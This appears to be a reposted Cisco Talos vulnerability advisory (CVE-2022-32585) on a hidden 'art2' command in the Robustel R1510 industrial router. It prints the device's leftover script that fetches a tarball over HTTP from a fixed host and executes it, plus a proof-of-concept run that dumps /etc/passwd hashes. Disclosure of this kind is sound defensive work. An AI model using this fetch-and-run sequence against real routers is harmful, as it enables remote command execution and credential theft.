Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-32585: TALOS-2022-1570 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the clish art2 functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.

CVE
#vulnerability#linux#cisco#intel#acer#ssh

Summary

A command execution vulnerability exists in the clish art2 functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.

Tested Versions

Robustel R1510 3.3.0

Product URLs

R1510 - https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/

CVSSv3 Score

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-489 - Leftover Debug Code

Details

The R1510 is an industrial cellular router. It offers several advanced software like an innovative use of Open VPN, Cloud management, data over-use guard, smart reboot and others.

The R1510 has enabled the SSH service. But, instead of providing a linux shell it prompt a CLISH shell. This shell allow to express, through XML configuration files, different type of commands.

Here it is the prompt after login as admin:

ssh [email protected]    
([email protected]) Password: 
# 
!              Comments
add            Add a list entry of configuration
clear          Clear statistics
config         Configuration operation
debug          Output debug information to the console
del            Delete a list entry of configuration
do             Set the level state of the do
exit           Exit from the CLI
help           Display an overview of the CLI syntax
ovpn_cert_get  Download OpenVPN certificate file via http or ftp
ping           Send messages to network hosts
reboot         Halt and perform a cold restart
set            Set system configuration
show           Show system configuration
status         Show running system information
tftpupdate     Update firmware or configuration file using tftp
traceroute     Print the route packets trace to network host
trigger        Trigger action
urlupdate      Update firmware via http or ftp
ver            Show version of firmware

# 

An hidden command exist in this menu that is called art2:

# art2 
String  Version of art2
#

When called the following shell script is executed:

#!/bin/sh
#build temporary directory

if [ $# -lt 1 ]; then
    echo "Usage : $0 <Version>"
    exit 1;
fi

VER=$1
DIR=/tmp/art2
if [ ! -d ${DIR} ]; then
        mkdir ${DIR}
fi
cd ${DIR}

#download art.ko and nart.out

rm -rf *

wget http://192.168.0.10/r1510ArtFile.tar.gz

tar -xzvf r1510ArtFile.tar.gz

#change mode of art.ko and nart.out, add execute ability.
chmod 755 r1510-art-factory-${VER}.ko r1510-nart-factory-${VER}.bin

[...]

#start art application
./r1510-nart-factory-${VER}.bin -console

This script will download the file r1510ArtFile.tar.gz from the host with address 192.168.0.10. Then it will unpack the file and eventually execute the file r1510-nart-factory-${VER}.bin contained in it. This can lead to arbitrary command execution.

Exploit Proof of Concept

Following the execution of art2 with 0 as argument.

# art2 0
# Connecting to 192.168.0.10 (192.168.0.10:80)
r1510ArtFile.tar.gz  100% |***************************************|   171   0:00:00 ETA
r1510-nart-factory-0.bin
[...]
root
root:$1$ciDDcCQI$ksDdbx2gX84EQfRCUxKGA/:10933:0:99999:7:::
admin:$1$0Y1zMICY$2676GjK83hpbydoXDggR8/:16506:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
adm:*:10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
[...]

Inside the r1510-nart-factory-0.bin there are two commands, whoami and cat /etc/passwd.

Timeline

2022-06-27 - Initial vendor contact
2022-06-28 - Vendor Disclosure
2022-06-30 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

Related news

The many vulnerabilities Talos discovered in SOHO and industrial wireless routers post-VPNFilter

Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance.

Vulnerability Spotlight: Multiple issues in Robustel R1510 cellular router could lead to code execution, denial of service

Francesco Benvenuto of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.  Cisco Talos recently discovered nine vulnerabilities in the Robustel R1510 industrial cellular router, several of which could allow an adversary to inject operating system code remotely.  The Robustel R1510 router is a dual-ethernet port wireless router that shares 3G and 4G wireless signals for use in industrial and internet-of-things environments. The router includes the use of open VPN tunneling, a cloud management platform to manage other devices and routers and different safeguards to manage data caps. Talos discovered five operating system command injection vulnerabilities in the router that an adversary could trigger by sending the targeted device a specially crafted network request. All these vulnerabilities have a CVSS severity score of 9.1 out of 10:  TALOS-2022-1578 (CVE-2022-34850)  TALOS-2022-1577 (CVE-2022-33150)  TALOS-2022-1576 (CVE-2022-32765)  TALOS-2022-1573 (CVE-2022-33325 ...

Vulnerability Spotlight: Multiple issues in Robustel R1510 cellular router could lead to code execution, denial of service

Cisco Talos recently discovered nine vulnerabilities in the Robustel R1510 industrial cellular router, several of which could allow an adversary to inject operating system code remotely.

Vulnerability Spotlight: Command injection vulnerabilities in Robustel cellular router

Lilith >_> of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.  Cisco Talos recently discovered four vulnerabilities in the Robustel R1510 industrial cellular router.  The R1510 is a portable router that shares 2G, 3G and 4G wireless internet access. It comes with... [[ This is only the beginning! Please visit the blog for the complete entry ]]

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907